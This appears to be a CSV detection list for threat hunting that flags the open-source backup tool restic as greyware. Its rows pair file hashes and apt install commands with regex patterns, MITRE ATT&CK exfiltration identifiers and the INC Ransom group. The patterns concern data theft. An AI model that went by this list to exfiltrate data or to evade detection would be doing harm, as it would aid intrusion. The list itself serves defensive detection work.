"*a50a1a9bd8b387a4e1762adb62f09c416835aa15de9a27e79815b5b62c5951ec*",".{0,1000}a50a1a9bd8b387a4e1762adb62f09c416835aa15de9a27e79815b5b62c5951ec.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a5581e05f792ca9ddec49004a9e3c9d203663e1b2ab330364d1e6ccb32bd8226*",".{0,1000}a5581e05f792ca9ddec49004a9e3c9d203663e1b2ab330364d1e6ccb32bd8226.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a58c0cd4b456e360cfda39c325137343484606e93b500142a2a6730dd0b9dae1*",".{0,1000}a58c0cd4b456e360cfda39c325137343484606e93b500142a2a6730dd0b9dae1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a6e54383b67446523cb54671b2ce35167bd8c4b9a507025862fed74f0ebe27f2*",".{0,1000}a6e54383b67446523cb54671b2ce35167bd8c4b9a507025862fed74f0ebe27f2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a6ebeb84345adc07ff6fad6bc4e8f404dbad73c106a6e2f8a7f635e062efe9ed*",".{0,1000}a6ebeb84345adc07ff6fad6bc4e8f404dbad73c106a6e2f8a7f635e062efe9ed.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a7a82eca050224c9cd070fea1d4208fe92358c5942321d6e01eff84a77839fb8*",".{0,1000}a7a82eca050224c9cd070fea1d4208fe92358c5942321d6e01eff84a77839fb8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a7eec25a26998f786481137e8bca3b7fce2275502cec2221a01113c7811fbf48*",".{0,1000}a7eec25a26998f786481137e8bca3b7fce2275502cec2221a01113c7811fbf48.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a85ff11195be3386ea7d68cb9bf2fa7c43896ce22b8a5f95b63b5737a6fb388e*",".{0,1000}a85ff11195be3386ea7d68cb9bf2fa7c43896ce22b8a5f95b63b5737a6fb388e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a88ca09d1dd051d470965667a224a2b81930c6628a0566b7b17868be40207dc8*",".{0,1000}a88ca09d1dd051d470965667a224a2b81930c6628a0566b7b17868be40207dc8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a907b585267cc24f1b884ace352eaca2f987c0aaf72b344a6b0da8264c5cf6a9*",".{0,1000}a907b585267cc24f1b884ace352eaca2f987c0aaf72b344a6b0da8264c5cf6a9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a9080fc18d6015126864873dba3307b2b9c8ab5ecf79da3c1ae25cb2988fc9bd*",".{0,1000}a9080fc18d6015126864873dba3307b2b9c8ab5ecf79da3c1ae25cb2988fc9bd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a94d6c1feb0034fcff3e8b4f2d65c0678f906fc21a1cf2d435341f69e7e7af52*",".{0,1000}a94d6c1feb0034fcff3e8b4f2d65c0678f906fc21a1cf2d435341f69e7e7af52.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a9507a67b50c7e4ab38c2334ef037a78ca5cc257decf1d78b8afbdc0fa73ee18*",".{0,1000}a9507a67b50c7e4ab38c2334ef037a78ca5cc257decf1d78b8afbdc0fa73ee18.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*a9c88d5288ce04a6cc78afcda7590d3124966dab3daa9908de9b3e492e2925fb*",".{0,1000}a9c88d5288ce04a6cc78afcda7590d3124966dab3daa9908de9b3e492e2925fb.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*aa834effee692d7aed5973dee1d810420c0d3b98eb8a3b89620c207bff01f78e*",".{0,1000}aa834effee692d7aed5973dee1d810420c0d3b98eb8a3b89620c207bff01f78e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*aa86e5667c46ab0bdf8ceca80fa3c8775da2bbc18656250a745ac8b042837a70*",".{0,1000}aa86e5667c46ab0bdf8ceca80fa3c8775da2bbc18656250a745ac8b042837a70.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*aada314b9afa5936d4ed401ba925106c20b07908ca39a9d363e0de57a99759ac*",".{0,1000}aada314b9afa5936d4ed401ba925106c20b07908ca39a9d363e0de57a99759ac.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ab8de228f748301d39294ae37b82aa068a47c9d36b42fd23c06afcb3375da1cd*",".{0,1000}ab8de228f748301d39294ae37b82aa068a47c9d36b42fd23c06afcb3375da1cd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ad4f5f6a6dbfe7ea29037f8d3a04161580cd109b99a3b474766927b2bf160984*",".{0,1000}ad4f5f6a6dbfe7ea29037f8d3a04161580cd109b99a3b474766927b2bf160984.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ad932c8eeb195c5880274623fff8fb7f97c433133db49c29d46ad64fcdcb5698*",".{0,1000}ad932c8eeb195c5880274623fff8fb7f97c433133db49c29d46ad64fcdcb5698.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*add9c85b9fd3f3594d0630518ba59220b9eec8441205b2acf8c61d4068003eeb*",".{0,1000}add9c85b9fd3f3594d0630518ba59220b9eec8441205b2acf8c61d4068003eeb.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ae4aa8f67e7cb800e060a454c72db0d8c0f8a94ba3ef520526c6d5df7f384995*",".{0,1000}ae4aa8f67e7cb800e060a454c72db0d8c0f8a94ba3ef520526c6d5df7f384995.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*aeabbac9038f4826a043f2adb165c46b6e2af47bb363aab713f4841b793d5406*",".{0,1000}aeabbac9038f4826a043f2adb165c46b6e2af47bb363aab713f4841b793d5406.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*af0592eecf1901f283b08bcbd1054f6ae50b5703c2da9ed8a4dcc858220de4a1*",".{0,1000}af0592eecf1901f283b08bcbd1054f6ae50b5703c2da9ed8a4dcc858220de4a1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*af5c388b467a78ceba2e47c2b1840d28209f1d2c1063b21cb20d79ab18ef7956*",".{0,1000}af5c388b467a78ceba2e47c2b1840d28209f1d2c1063b21cb20d79ab18ef7956.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*afb6a4c0f19afbca0dcdfc6daecd05db72440b9f66be3b226bbdd3d601d256dd*",".{0,1000}afb6a4c0f19afbca0dcdfc6daecd05db72440b9f66be3b226bbdd3d601d256dd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*apt install restic*",".{0,1000}apt\sinstall\srestic.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*apt-get install restic*",".{0,1000}apt\-get\sinstall\srestic.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b075acc6e8a6a1f619752b6106299e66ff7fc95032bd9a9096718c7600bd5c72*",".{0,1000}b075acc6e8a6a1f619752b6106299e66ff7fc95032bd9a9096718c7600bd5c72.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b095c8ae34961ed96ebd2cfb8d99d0aae0c9194beee50efcb55743a56a3f2527*",".{0,1000}b095c8ae34961ed96ebd2cfb8d99d0aae0c9194beee50efcb55743a56a3f2527.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b0d62a246efdf89a35137f55d840b7f7d1a6c231a4a2a14bd4ab2375355644ac*",".{0,1000}b0d62a246efdf89a35137f55d840b7f7d1a6c231a4a2a14bd4ab2375355644ac.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b1213c190d359872abf866bbfbd98b8140e16177157d241330b2ad172fa59daa*",".{0,1000}b1213c190d359872abf866bbfbd98b8140e16177157d241330b2ad172fa59daa.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b168ad78533011155648042d2900398596b0b128d12aeab2314424eb8be06794*",".{0,1000}b168ad78533011155648042d2900398596b0b128d12aeab2314424eb8be06794.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b17778908c7e0b879b79b4aadf2dc28e9361e555fb68b35243c325b390628eed*",".{0,1000}b17778908c7e0b879b79b4aadf2dc28e9361e555fb68b35243c325b390628eed.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b1cb1665e707241d9b0df4443c75ecd01f036562b1ab0d83eaf9a6fb4cfa018d*",".{0,1000}b1cb1665e707241d9b0df4443c75ecd01f036562b1ab0d83eaf9a6fb4cfa018d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b27ceab87644e8402f0a72d5f84bfa6e52b4c9c31293fe42fef6edba58fd81a3*",".{0,1000}b27ceab87644e8402f0a72d5f84bfa6e52b4c9c31293fe42fef6edba58fd81a3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b379d721a766c8b80a121173be37050c9ecc94b11c5dbb0e246308ebbb5fbe74*",".{0,1000}b379d721a766c8b80a121173be37050c9ecc94b11c5dbb0e246308ebbb5fbe74.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b396b58b9729c83406ade3cd3f6d52820a7ff6cf36cd4a59eb9d87ee267591fc*",".{0,1000}b396b58b9729c83406ade3cd3f6d52820a7ff6cf36cd4a59eb9d87ee267591fc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b3c09137b462548f44d764f98909534bef6e85fe029d4daf60545642cdefd3dd*",".{0,1000}b3c09137b462548f44d764f98909534bef6e85fe029d4daf60545642cdefd3dd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b3e1befd68844e32730608eb0bd7465a4e634154ac4a90ab8d48738c05054e42*",".{0,1000}b3e1befd68844e32730608eb0bd7465a4e634154ac4a90ab8d48738c05054e42.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b52adf7f57f96bc43c7380afc6aa2f549b530e42436af53ba5b6ca4a75ed343e*",".{0,1000}b52adf7f57f96bc43c7380afc6aa2f549b530e42436af53ba5b6ca4a75ed343e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b61cc885ac54a8f87869094cb343095b341e0db10898d2889942632f6155f1ff*",".{0,1000}b61cc885ac54a8f87869094cb343095b341e0db10898d2889942632f6155f1ff.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b626b5bb92017ef63e3450aeeeb50583be95fadc09e9d2f44c5f37caa8a61e59*",".{0,1000}b626b5bb92017ef63e3450aeeeb50583be95fadc09e9d2f44c5f37caa8a61e59.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b8c838d10851d63bca4f99ebb22b29989f517c66ea950eb0a9d7a4d110d2e86a*",".{0,1000}b8c838d10851d63bca4f99ebb22b29989f517c66ea950eb0a9d7a4d110d2e86a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b91f5ef6203a5c50a72943c21aaef336e1344f19a3afd35406c00f065db8a8b9*",".{0,1000}b91f5ef6203a5c50a72943c21aaef336e1344f19a3afd35406c00f065db8a8b9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*b95a258099aee9a56e620ccebcecabc246ee7f8390e3937ccedadd609c6d2dd0*",".{0,1000}b95a258099aee9a56e620ccebcecabc246ee7f8390e3937ccedadd609c6d2dd0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ba1320c819ee2b6e29fe38ea4df592813e7219a89175313556110775f2204201*",".{0,1000}ba1320c819ee2b6e29fe38ea4df592813e7219a89175313556110775f2204201.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ba4393a03124724ca068684e02727bcede7e897eaa3698362bf1a452d1ed5823*",".{0,1000}ba4393a03124724ca068684e02727bcede7e897eaa3698362bf1a452d1ed5823.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*bbe35e6cee0f2d86632a419a45fc63ec44eb1ef01f14fe53c5dddb527545e16f*",".{0,1000}bbe35e6cee0f2d86632a419a45fc63ec44eb1ef01f14fe53c5dddb527545e16f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*bcbd51fae14c1b87542a6130b0aea2f77d888615bc2ebcc517977d56ed1fe582*",".{0,1000}bcbd51fae14c1b87542a6130b0aea2f77d888615bc2ebcc517977d56ed1fe582.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*bcc708853cb655ade9ab3dba63fb1a585508ca1f55fe0ec41d97f84c97a25495*",".{0,1000}bcc708853cb655ade9ab3dba63fb1a585508ca1f55fe0ec41d97f84c97a25495.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*bcda505dc0c24c5a438490cb329180f6215a57d3fa5c1209570b86f9472f0474*",".{0,1000}bcda505dc0c24c5a438490cb329180f6215a57d3fa5c1209570b86f9472f0474.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*bcefbd70874b8198be4635b5c64b15359a7c28287d274e02d5177c4933ad3f71*",".{0,1000}bcefbd70874b8198be4635b5c64b15359a7c28287d274e02d5177c4933ad3f71.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*bd6f57c36d0cf7393e1dcf6912c36887715864945fa06c457f135f9ea33fcf41*",".{0,1000}bd6f57c36d0cf7393e1dcf6912c36887715864945fa06c457f135f9ea33fcf41.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*be4b5c4bf5fde4fe59cbd98a5691035d5866613a2bb53ee8588d393ee14af667*",".{0,1000}be4b5c4bf5fde4fe59cbd98a5691035d5866613a2bb53ee8588d393ee14af667.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*be707189365dc12e5742234e07d2bae35ccdcff0de458dceefd4812796fe2fb8*",".{0,1000}be707189365dc12e5742234e07d2bae35ccdcff0de458dceefd4812796fe2fb8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*bee03789cb90ecea446cce9211600312ca43c8ab4c6231ea64234b65eb2a5b82*",".{0,1000}bee03789cb90ecea446cce9211600312ca43c8ab4c6231ea64234b65eb2a5b82.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*bf1dcd0761b81ba9b79c01399083c6df74b709b44303ff01433753a9cc731caf*",".{0,1000}bf1dcd0761b81ba9b79c01399083c6df74b709b44303ff01433753a9cc731caf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*bf6e09743df6899a02f0647d899fb008932760ea872667287bbc47b42091a3b0*",".{0,1000}bf6e09743df6899a02f0647d899fb008932760ea872667287bbc47b42091a3b0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c1309a2dc51340d2115e3c5e2ad31917c401132406e92774b70c2470ba631e7b*",".{0,1000}c1309a2dc51340d2115e3c5e2ad31917c401132406e92774b70c2470ba631e7b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c1439cff56678f08ca43ae32b4842fd43ada6b2c2798e647250e93bd32687c26*",".{0,1000}c1439cff56678f08ca43ae32b4842fd43ada6b2c2798e647250e93bd32687c26.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c1adbf4fe3244c1e53659221eafb35da0de80dd9f7c653dc1cb9b8037f8d01d2*",".{0,1000}c1adbf4fe3244c1e53659221eafb35da0de80dd9f7c653dc1cb9b8037f8d01d2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c2cc496b63e67636dbde1d94f31f5c36eb532f11953a36c56f7aebd7077befe5*",".{0,1000}c2cc496b63e67636dbde1d94f31f5c36eb532f11953a36c56f7aebd7077befe5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*c3145c4f1e747ef9c1b2f953291f96f87abeb3e9686e8a91340ed4bd191d9941*",".{0,1000}c3145c4f1e747ef9c1b2f953291f96f87abeb3e9686e8a91340ed4bd191d9941.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
